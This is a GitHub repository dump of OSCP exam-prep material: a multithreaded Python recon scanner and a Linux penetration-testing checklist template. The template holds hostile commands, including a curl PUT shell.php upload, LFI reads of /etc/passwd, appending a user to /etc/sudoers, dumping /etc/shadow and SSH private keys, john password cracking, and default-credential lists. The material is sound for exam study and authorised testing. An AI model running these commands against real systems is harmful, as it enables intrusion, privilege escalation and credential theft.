Repository: xapax/oscp
Branch: master
Commit: 7ea469640337
Files: 6
Total size: 43.4 KB

Directory structure:
gitextract_kkjeoamh/
├── README.md
├── recon_enum/
│   └── reconscan.py
├── reports/
│   └── reports.txt
├── setup.sh
└── templates/
    ├── linux-template.md
    └── windows-template.md

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================
# oscp

## Reconscan.py

This script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp/), but it has been heavily rewritten: some things have been added, other things have been removed.

The script was written as preparation for the OSCP exam. It was never meant to be a general-purpose script, so if you want to use it you have to fix all the hardcoded paths.

The script is multithreaded and can be run against several hosts at once. It is invoked like this:

```
python reconscan.py 192.168.1.101 192.168.1.102 192.168.1.103
```

One important thing to note is that I removed the scan of all ports, because it would sometimes take too long to run. So make sure you either add that scan back or run it afterwards, so you don't miss any ports.

Please note that the script includes dirb and nikto scans that are very invasive. The script also includes several nmap scripts that check for vulnerabilities. So yeah, this script would be pretty illegal and bad to run against a machine you don't have permission to attack.

## Templates

I created two templates that I used as a guide for every machine I attacked. One template is for Linux machines and the other for Windows; there are some differences between them. The templates became kind of my checklists. They are divided into three sections: **recon**, **privilege escalation** and **loot**.

The templates are written in markdown, but I never actually rendered them, so I don't really know what they look like rendered. They are probably pretty messy. I also used them together with markdown syntax-highlighting in my editor, which made it easy to navigate the files.

The templates have a few keywords in them, like **INSERTIPADDRESS**. These are hooks that are read by reconscan.py, which inserts the target machine's IP address automatically. Some other things are also inserted automatically, like a basic nmap scan and a nikto scan.

Wherever there are references to a book, this is the book: https://bobloblaw.gitbooks.io/security/content/

================================================
FILE: recon_enum/reconscan.py
================================================
#!/usr/bin/env python
import subprocess
import multiprocessing
import os
import time
import sys
import socket
import re

# Todo:
# Add mysql nmap-script
# Add snmp enumeration (snmpEnum is not implemented)

start = time.time()


class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


# Runs one enumeration function in its own process, so several run at once.
def multProc(targetin, scanip, port):
    """Start targetin(scanip, port) in a child process and return immediately."""
    p = multiprocessing.Process(target=targetin, args=(scanip, port))
    p.start()
    return


def connect_to_port(ip_address, port, service):
    """Grab the banner by hand (and try trivial logins) and store the dialogue
    in the templates."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip_address, int(port)))
    banner = s.recv(1024)
    if service == "ftp":
        s.send("USER anonymous\r\n")
        user = s.recv(1024)
        s.send("PASS anonymous\r\n")
        password = s.recv(1024)
        total_communication = banner + "\r\n" + user + "\r\n" + password
        write_to_file(ip_address, "ftp-connect", total_communication)
    elif service == "smtp":
        total_communication = banner + "\r\n"
        write_to_file(ip_address, "smtp-connect", total_communication)
    elif service == "ssh":
        total_communication = banner
        write_to_file(ip_address, "ssh-connect", total_communication)
    elif service == "pop3":
        s.send("USER root\r\n")
        user = s.recv(1024)
        s.send("PASS root\r\n")
        password = s.recv(1024)
        total_communication = banner + user + password
        write_to_file(ip_address, "pop3-connect", total_communication)
    s.close()


def write_to_file(ip_address, enum_type, data):
    """Put scan output into both mapping templates in place of its marker.

    The replacement is done in Python, not by handing the scan output to the
    `replace` utility through shell=True as before: banners, page titles and
    other scan output are controlled by the target and must never be
    interpolated into a shell command line.
    """
    markers = {
        "portscan": "INSERTTCPSCAN",
        "dirb": "INSERTDIRBSCAN",
        "nikto": "INSERTNIKTOSCAN",
        "ftp-connect": "INSERTFTPTEST",
        "smtp-connect": "INSERTSMTPCONNECT",
        "ssh-connect": "INSERTSSHCONNECT",
        "pop3-connect": "INSERTPOP3CONNECT",
        "curl": "INSERTCURLHEADER",
    }
    file_path_linux = '../reports/%s/mapping-linux.md' % (ip_address)
    file_path_windows = '../reports/%s/mapping-windows.md' % (ip_address)
    paths = [file_path_linux, file_path_windows]
    print bcolors.OKGREEN + "INFO: Writing " + enum_type + " to template files:\n " + file_path_linux + " \n" + file_path_windows + bcolors.ENDC
    marker = markers.get(enum_type)
    if marker is None:
        print bcolors.WARNING + "WARN: No template marker for " + enum_type + bcolors.ENDC
        return
    for path in paths:
        with open(path) as f:
            content = f.read()
        with open(path, "w") as f:
            f.write(content.replace(marker, data))
    return


def dirb(ip_address, port, url_start, wordlist="/usr/share/wordlists/dirb/big.txt,/usr/share/wordlists/dirb/vulns/cgis.txt"):
    # dirb takes several wordlists separated by commas (no spaces). Kali path; adjust to your install.
    print bcolors.HEADER + "INFO: Starting dirb scan for " + ip_address + bcolors.ENDC
    DIRBSCAN = "dirb %s://%s:%s %s -o ../reports/%s/dirb-%s-%s.txt -r" % (url_start, ip_address, port, wordlist, ip_address, ip_address, port)
    print bcolors.HEADER + DIRBSCAN + bcolors.ENDC
    results_dirb = subprocess.check_output(DIRBSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with dirb scan for " + ip_address + bcolors.ENDC
    print results_dirb
    write_to_file(ip_address, "dirb", results_dirb)
    return


def nikto(ip_address, port, url_start):
    print bcolors.HEADER + "INFO: Starting nikto scan for " + ip_address + bcolors.ENDC
    NIKTOSCAN = "nikto -h %s://%s -p %s -o ../reports/%s/nikto-%s-%s.txt" % (url_start, ip_address, port, ip_address, url_start, ip_address)
    print bcolors.HEADER + NIKTOSCAN + bcolors.ENDC
    results_nikto = subprocess.check_output(NIKTOSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with NIKTO-scan for " + ip_address + bcolors.ENDC
    print results_nikto
    write_to_file(ip_address, "nikto", results_nikto)
    return


HTTP_SCRIPTS = ("http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,"
                "http-config-backup,http-default-accounts,http-methods,http-method-tamper,"
                "http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,"
                "http-git,http-iis-webdav-vuln,http-php-version,http-shellshock,http-vuln-cve2015-1635")


def httpEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected http on " + ip_address + ":" + port + bcolors.ENDC
    print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC
    dirb_process = multiprocessing.Process(target=dirb, args=(ip_address, port, "http"))
    dirb_process.start()
    nikto_process = multiprocessing.Process(target=nikto, args=(ip_address, port, "http"))
    nikto_process.start()
    CURLSCAN = "curl -I http://%s:%s" % (ip_address, port)
    print bcolors.HEADER + CURLSCAN + bcolors.ENDC
    curl_results = subprocess.check_output(CURLSCAN, shell=True)
    write_to_file(ip_address, "curl", curl_results)
    HTTPSCAN = "nmap -sV -Pn -p %s --script=%s -oN ../reports/%s/%s_http.nmap %s" % (port, HTTP_SCRIPTS, ip_address, ip_address, ip_address)
    print bcolors.HEADER + HTTPSCAN + bcolors.ENDC
    http_results = subprocess.check_output(HTTPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTP-SCAN for " + ip_address + bcolors.ENDC
    print http_results
    return


def httpsEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected https on " + ip_address + ":" + port + bcolors.ENDC
    print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC
    dirb_process = multiprocessing.Process(target=dirb, args=(ip_address, port, "https"))
    dirb_process.start()
    nikto_process = multiprocessing.Process(target=nikto, args=(ip_address, port, "https"))
    nikto_process.start()
    SSLSCAN = "sslscan %s:%s >> ../reports/%s/ssl_scan_%s" % (ip_address, port, ip_address, ip_address)
    print bcolors.HEADER + SSLSCAN + bcolors.ENDC
    ssl_results = subprocess.check_output(SSLSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with SSLSCAN for " + ip_address + bcolors.ENDC
    HTTPSCANS = "nmap -sV -Pn -p %s --script=%s -oN ../reports/%s/%s_https.nmap %s" % (port, HTTP_SCRIPTS, ip_address, ip_address, ip_address)
    print bcolors.HEADER + HTTPSCANS + bcolors.ENDC
    https_results = subprocess.check_output(HTTPSCANS, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTPS-scan for " + ip_address + bcolors.ENDC
    print https_results
    return


def mssqlEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected MS-SQL on " + ip_address + ":" + port + bcolors.ENDC
    print bcolors.HEADER + "INFO: Performing nmap mssql script scan for " + ip_address + ":" + port + bcolors.ENDC
    # Only ms-sql-* scripts here; the mysql-* scripts do not apply to MS SQL (see the Todo list).
    MSSQLSCAN = "nmap -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=1433,mssql.username=sa,mssql.password=sa -oN ../reports/%s/mssql_%s.nmap %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + MSSQLSCAN + bcolors.ENDC
    mssql_results = subprocess.check_output(MSSQLSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with MSSQL-scan for " + ip_address + bcolors.ENDC
    print mssql_results
    return


def smtpEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected smtp on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "smtp")
    SMTPSCAN = "nmap -sV -Pn -p %s --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 %s -oN ../reports/%s/smtp_%s.nmap" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + SMTPSCAN + bcolors.ENDC
    smtp_results = subprocess.check_output(SMTPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMTP-scan for " + ip_address + bcolors.ENDC
    print smtp_results
    # write_to_file(ip_address, "smtp", smtp_results)
    return


def smbNmap(ip_address, port):
    print "INFO: Detected SMB on " + ip_address + ":" + port
    smbNmap = "nmap --script=smb-enum-shares,smb-ls,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos %s -oN ../reports/%s/smb_%s.nmap" % (ip_address, ip_address, ip_address)
    smbNmap_results = subprocess.check_output(smbNmap, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMB-Nmap-scan for " + ip_address + bcolors.ENDC
    print smbNmap_results
    return


def smbEnum(ip_address, port):
    print "INFO: Detected SMB on " + ip_address + ":" + port
    enum4linux = "enum4linux -a %s > ../reports/%s/enum4linux_%s 2>/dev/null" % (ip_address, ip_address, ip_address)
    enum4linux_results = subprocess.check_output(enum4linux, shell=True)
    print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with ENUM4LINUX scan for " + ip_address + bcolors.ENDC
    print enum4linux_results
    return


def ftpEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected ftp on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "ftp")
    FTPSCAN = "nmap -sV -Pn -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '../reports/%s/ftp_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + FTPSCAN + bcolors.ENDC
    results_ftp = subprocess.check_output(FTPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with FTP-Nmap-scan for " + ip_address + bcolors.ENDC
    print results_ftp
    return


def udpScan(ip_address):
    print bcolors.HEADER + "INFO: Starting UDP scans on " + ip_address + bcolors.ENDC
    UDPSCAN = "nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '../reports/%s/udp_%s.nmap' %s" % (ip_address, ip_address, ip_address)
    print bcolors.HEADER + UDPSCAN + bcolors.ENDC
    udpscan_results = subprocess.check_output(UDPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with UDP-Nmap scan for " + ip_address + bcolors.ENDC
    print udpscan_results
    UNICORNSCAN = "unicornscan -mU -I %s > ../reports/%s/unicorn_udp_%s.txt" % (ip_address, ip_address, ip_address)
    unicornscan_results = subprocess.check_output(UNICORNSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with UNICORNSCAN for " + ip_address + bcolors.ENDC


def sshScan(ip_address, port):
    print bcolors.HEADER + "INFO: Detected SSH on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "ssh")
    SSHSCAN = "nmap -sV -Pn -p %s --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '../reports/%s/ssh_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + SSHSCAN + bcolors.ENDC
    results_ssh = subprocess.check_output(SSHSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SSH-Nmap-scan for " + ip_address + bcolors.ENDC
    print results_ssh
    return


def pop3Scan(ip_address, port):
    print bcolors.HEADER + "INFO: Detected POP3 on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "pop3")
    POP3SCAN = "nmap -sV -Pn -p %s --script=pop3-brute,pop3-capabilities,pop3-ntlm-info -oN '../reports/%s/pop3_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + POP3SCAN + bcolors.ENDC
    results_pop3 = subprocess.check_output(POP3SCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with POP3-Nmap-scan for " + ip_address + bcolors.ENDC
    print results_pop3
    return


def nmapScan(ip_address):
    ip_address = ip_address.strip()
    print bcolors.OKGREEN + "INFO: Running general TCP/UDP nmap scans for " + ip_address + bcolors.ENDC
    TCPSCAN = "nmap -sV -O %s -oN '../reports/%s/%s.nmap'" % (ip_address, ip_address, ip_address)
    print bcolors.HEADER + TCPSCAN + bcolors.ENDC
    results = subprocess.check_output(TCPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with BASIC Nmap-scan for " + ip_address + bcolors.ENDC
    print results
    p = multiprocessing.Process(target=udpScan, args=(ip_address,))
    p.start()
    write_to_file(ip_address, "portscan", results)

    # Build {service: [port/proto, ...]} from the open TCP lines of the scan.
    lines = results.split("\n")
    serv_dict = {}
    for line in lines:
        line = line.strip()
        if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
            while "  " in line:
                line = line.replace("  ", " ")
            linesplit = line.split(" ")
            service = linesplit[2]  # grab the service name
            port = linesplit[0]     # grab the port/proto
            ports = serv_dict.get(service, [])
            ports.append(port)
            serv_dict[service] = ports  # add service to the dictionary along with the associated port(s)

    # Go through the service dictionary to call additional targeted enumeration functions.
    for serv in serv_dict:
        ports = [p.split("/")[0] for p in serv_dict[serv]]
        # A bare "http" must match too; the old pattern http[^s] required a character after "http".
        if re.match(r"http(?!s)", serv):
            for port in ports:
                multProc(httpEnum, ip_address, port)
        elif re.search(r"https|ssl", serv):
            for port in ports:
                multProc(httpsEnum, ip_address, port)
        elif "smtp" in serv:
            for port in ports:
                multProc(smtpEnum, ip_address, port)
        elif "ftp" in serv:
            for port in ports:
                multProc(ftpEnum, ip_address, port)
        elif ("microsoft-ds" in serv) or ("netbios-ssn" == serv):
            for port in ports:
                multProc(smbEnum, ip_address, port)
                multProc(smbNmap, ip_address, port)
        elif "ms-sql" in serv:
            for port in ports:
                multProc(mssqlEnum, ip_address, port)
        elif "ssh" in serv:
            for port in ports:
                multProc(sshScan, ip_address, port)
        elif "pop3" in serv:
            for port in ports:
                multProc(pop3Scan, ip_address, port)
    return


print bcolors.HEADER
print "------------------------------------------------------------"
print "!!!!                    RECON SCAN                     !!!!!"
print "!!!!          A multi-process service scanner          !!!!!"
print "!!!!     dirb, nikto, ftp, ssh, mssql, pop3, tcp       !!!!!"
print "!!!!                  udp, smtp, smb                   !!!!!"
print "------------------------------------------------------------"

if len(sys.argv) < 2:
    print ""
    print "Usage: python reconscan.py <ip> [<ip> ...]"
    print "Example: python reconscan.py 192.168.1.101 192.168.1.102"
    print ""
    print "############################################################"
    sys.exit()

print bcolors.ENDC

if __name__ == '__main__':
    # Setting ip targets
    targets = sys.argv[1:]
    dirs = os.listdir("../reports/")
    for scanip in targets:
        scanip = scanip.rstrip()
        if not scanip in dirs:
            print bcolors.HEADER + "INFO: No folder was found for " + scanip + ". Setting up folder." + bcolors.ENDC
            subprocess.check_output("mkdir ../reports/" + scanip, shell=True)
            subprocess.check_output("mkdir ../reports/" + scanip + "/exploits", shell=True)
            subprocess.check_output("mkdir ../reports/" + scanip + "/privesc", shell=True)
            print bcolors.OKGREEN + "INFO: Folder created here: " + "../reports/" + scanip + bcolors.ENDC
            subprocess.check_output("cp ../templates/windows-template.md ../reports/" + scanip + "/mapping-windows.md", shell=True)
            subprocess.check_output("cp ../templates/linux-template.md ../reports/" + scanip + "/mapping-linux.md", shell=True)
            print bcolors.OKGREEN + "INFO: Added pentesting templates: " + "../reports/" + scanip + bcolors.ENDC
            subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-windows.md", shell=True)
            subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-linux.md", shell=True)
        p = multiprocessing.Process(target=nmapScan, args=(scanip,))
        p.start()

================================================
FILE: reports/reports.txt
================================================

================================================
FILE: setup.sh
================================================
#!/bin/bash
folder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null)
echo -e '#!/bin/bash\n' > /usr/bin/reconscan
echo -e "cd \"$folder\" && python reconscan.py \"\$@\" \n" >> /usr/bin/reconscan
chmod +x /usr/bin/reconscan

================================================
FILE: templates/linux-template.md
================================================
## Info-sheet

- DNS-Domain name:
- Host name:
- OS:
- Server:
- Kernel:
- Workgroup:
- Windows domain:

Services and ports:

INSERTTCPSCAN

## Recon

```
Always start with a stealthy scan to avoid closing ports.

# Syn-scan
nmap -sS INSERTIPADDRESS

# Scan all ports, might take a while.
nmap INSERTIPADDRESS -p-

# Service-version, default scripts, OS:
nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333

# Scan for UDP
nmap INSERTIPADDRESS -sU
unicornscan -mU -v -I INSERTIPADDRESS

# Connect to udp if one is open
nc -u INSERTIPADDRESS 48772

# Monster scan
nmap INSERTIPADDRESS -p- -A -T4 -sC
```

### Port 21 - FTP

- FTP-Name:
- FTP-version:
- Anonymous login:

INSERTFTPTEST

```
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
```

### Port 22 - SSH

- Name:
- Version:
- Takes-password:
- If you have usernames test login with username:username

INSERTSSHCONNECT

```
nc INSERTIPADDRESS 22
```

### Port 25 - SMTP

- Name:
- Version:
- VRFY:

INSERTSMTPCONNECT

```
nc -nvv INSERTIPADDRESS 25
HELO foo

telnet INSERTIPADDRESS 25
VRFY root

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
```

### Port 69 - UDP - TFTP

This is used for tftp-server.

### Port 110 - Pop3

- Name:
- Version:

INSERTPOP3CONNECT

```
telnet INSERTIPADDRESS 110
USER pelle@INSERTIPADDRESS
PASS admin

or:

USER pelle
PASS admin

# List all emails
list

# Retrieve email number 5, for example
retr 5
```

### Port 111 - Rpcbind

```
rpcinfo -p INSERTIPADDRESS
```

### Port 135 - MSRPC

Some versions are vulnerable.
### Port 143 - Imap ### Port 139/445 - SMB - Name: - Version: - Domain/workgroup name: - Domain-sid: - Allows unauthenticated login: ``` nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445 enum4linux -a INSERTIPADDRESS rpcclient -U "" INSERTIPADDRESS srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall smbclient -L INSERTIPADDRESS smbclient //INSERTIPADDRESS/tmp smbclient \\\\INSERTIPADDRESS\\ipc$ -U john smbclient //INSERTIPADDRESS/ipc$ -U john ``` ### Port 161/162 UDP - SNMP ``` nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS snmp-check -t INSERTIPADDRESS -c public ``` ``` # Common community strings public private community ``` ### Port 554 - RTSP ### Port 1030/1032/1033/1038 Used by RPC to connect in domain network. 
## Port 1521 - Oracle - Name: - Version: - Password protected: ``` tnscmd10g version -h INSERTIPADDRESS tnscmd10g status -h INSERTIPADDRESS ``` ### Port 2049 - NFS ``` showmount -e INSERTIPADDRESS If you find anything you can mount it like this: mount INSERTIPADDRESS:/ /tmp/NFS mount -t INSERTIPADDRESS:/ /tmp/NFS ``` ### Port 2100 - Oracle XML DB - Name: - Version: - Default logins: ``` sys:sys scott:tiger ``` Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm ### 3306 - MySQL - Name: - Version: ``` nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306 mysql --host=INSERTIPADDRESS -u root -p ``` ### Port 3339 - Oracle web interface - Basic info about web service (apache, nginx, IIS) - Server: - Scripting language: - Apache Modules: - IP-address: ### Port 80 - Web server - Server: - Scripting language: - Apache Modules: - IP-address: - Domain-name address: INSERTCURLHEADER - Web application (ex, wordpress, joomla, phpmyadmin) - Name: - Version: - Admin-login: ``` # Nikto nikto -h http://INSERTIPADDRESS # Nikto with squid proxy nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444 # CMS Explorer cms-explorer -url http://INSERTIPADDRESS -type [Drupal, WordPress, Joomla, Mambo] # WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users) wpscan --url http://INSERTIPADDRESS wpscan --url http://INSERTIPADDRESS --enumerate vp wpscan --url http://INSERTIPADDRESS --enumerate vt wpscan --url http://INSERTIPADDRESS --enumerate u # Joomscan joomscan -u http://INSERTIPADDRESS joomscan -u http://INSERTIPADDRESS --enumerate-components # Get header curl -i INSERTIPADDRESS # Get everything curl -i -L INSERTIPADDRESS # Check for title and all links curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' # Look at page with just text curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq # Check if it is 
possible to upload curl -v -X OPTIONS http://INSERTIPADDRESS/ curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix ``` #### Nikto scan INSERTNIKTOSCAN #### Url brute force ``` # Not recursive dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt # Gobuster - remove relevant responde codes (403 for example) gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e ``` INSERTDIRBSCAN #### Default/Weak login Search documentation for default passwords and test them ``` site:webapplication.com password ``` ``` admin admin admin password admin admin root root root admin root password root password admin username username ``` #### LFI/RFI ``` fimap -u "http://INSERTIPADDRESS/example.php?test=" # Ordered output curl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page= ``` #### SQL-Injection ``` # Post ./sqlmap.py -r search-test.txt -p tfUPass # Get sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql # Crawl sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3 ``` #### Sql-login-bypass - Open Burp-suite - Make and intercept a request - Send to intruder - Cluster attack. - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html) - Attack - Check for response length variation ### Password brute force - last resort ``` cewl ``` ### Port 443 - HTTPS Heartbleed: ``` # Heartbleed sslscan INSERTIPADDRESS:443 ``` ## Vulnerability analysis Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilites and features. ### To try - List of possibilies Add possible exploits here: ### Find sploits - Searchsploit and google Where there are many exploits for a software, use google. It will automatically sort it by popularity. 
``` site:exploit-db.com apache 2.4.7 # Remove dos-exploits searchsploit Apache 2.4.7 | grep -v '/dos/' searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat" # Only search the title (exclude the path), add the -t searchsploit -t Apache | grep -v '/dos/' ``` ---------------------------------------------------------------------------- '''''''''''''''''''''''''''''''''' PRIVESC ''''''''''''''''''''''''''''''''' ----------------------------------------------------------------------------- ## Privilege escalation Now we start the whole enumeration-process over gain. - Kernel exploits - Programs running as root - Installed software - Weak/reused/plaintext passwords - Inside service - Suid misconfiguration - World writable scripts invoked by root - Unmounted filesystems Less likely - Private ssh keys - Bad path configuration - Cronjobs ### To-try list Here you will add all possible leads. What to try. ### Useful commands ``` # Spawning shell python -c 'import pty; pty.spawn("/bin/sh")' # Access to more binaries export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin # Set up webserver cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080 # Download all files wget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check ./LinEnum.sh -t -k password -r LinEnum.txt python linprivchecker.py extended ./unix-privesc-check standard # Writable directories /tmp /var/tmp # Add user to sudoers echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers ``` ### Basic info - OS: - Version: - Kernel version: - Architecture: - Current user: **Devtools:** - GCC: - NC: - WGET: **Users with login:** ``` uname -a env id cat /proc/version cat /etc/issue cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts # Users with login grep -vE "nologin" /etc/passwd # Priv Enumeration Scripts upload /unix-privesc-check upload 
/root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./ upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./ python linprivchecker.py extended ./LinEnum.sh -t -k password unix-privesc-check ``` ### Kernel exploits ``` site:exploit-db.com kernel version perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6 python linprivchecker.py extended ``` ### Programs running as root Look for webserver, mysql or anything else like that. ``` # Metasploit ps # Linux ps aux ``` ### Installed software ``` /usr/local/ /usr/local/src /usr/local/bin /opt/ /home /var/ /usr/src/ # Debian dpkg -l # CentOS, OpenSuse, Fedora, RHEL rpm -qa (CentOS / openSUSE ) # OpenBSD, FreeBSD pkg_info ``` ### Weak/reused/plaintext passwords - Check database config-file - Check databases - Check weak passwords ``` username:username username:username1 username:root username:admin username:qwerty username:password ``` - Check plaintext ``` ./LinEnum.sh -t -k password ``` ### Inside service ``` # Linux netstat -anlp netstat -ano ``` ### Suid misconfiguration Binary with suid permission can be run by anyone, but when they are run they are run as root! Example programs: ``` nmap vim nano ``` ``` find / -perm -u=s -type f 2>/dev/null ``` ### Unmounted filesystems Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again. 
```
mount -l
```

### Cronjob

Look for anything that is owned by a privileged user but writable by you.

```
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
```

### SSH Keys

Check all home directories.

```
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
```

### Bad path configuration

Requires user interaction.

------------------------------------------------------------------------
----------------------------- LOOT LOOT LOOT LOOT ----------------------
------------------------------------------------------------------------

## Loot

**Checklist**

- Proof:
- Network secret:
- Passwords and hashes:
- Dualhomed:
- Tcpdump:
- Interesting files:
- Databases:
- SSH-keys:
- Browser:
- Mail:

### Proof

```
/root/proof.txt
```

### Network secret

```
/root/network-secret.txt
```

### Passwords and hashes

```
cat /etc/passwd
cat /etc/shadow
unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
```

### Dualhomed

```
ifconfig
ifconfig -a
arp -a
```

### Tcpdump

```
tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
```

### Interesting files

```
# Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql

.ssh:
.bash_history
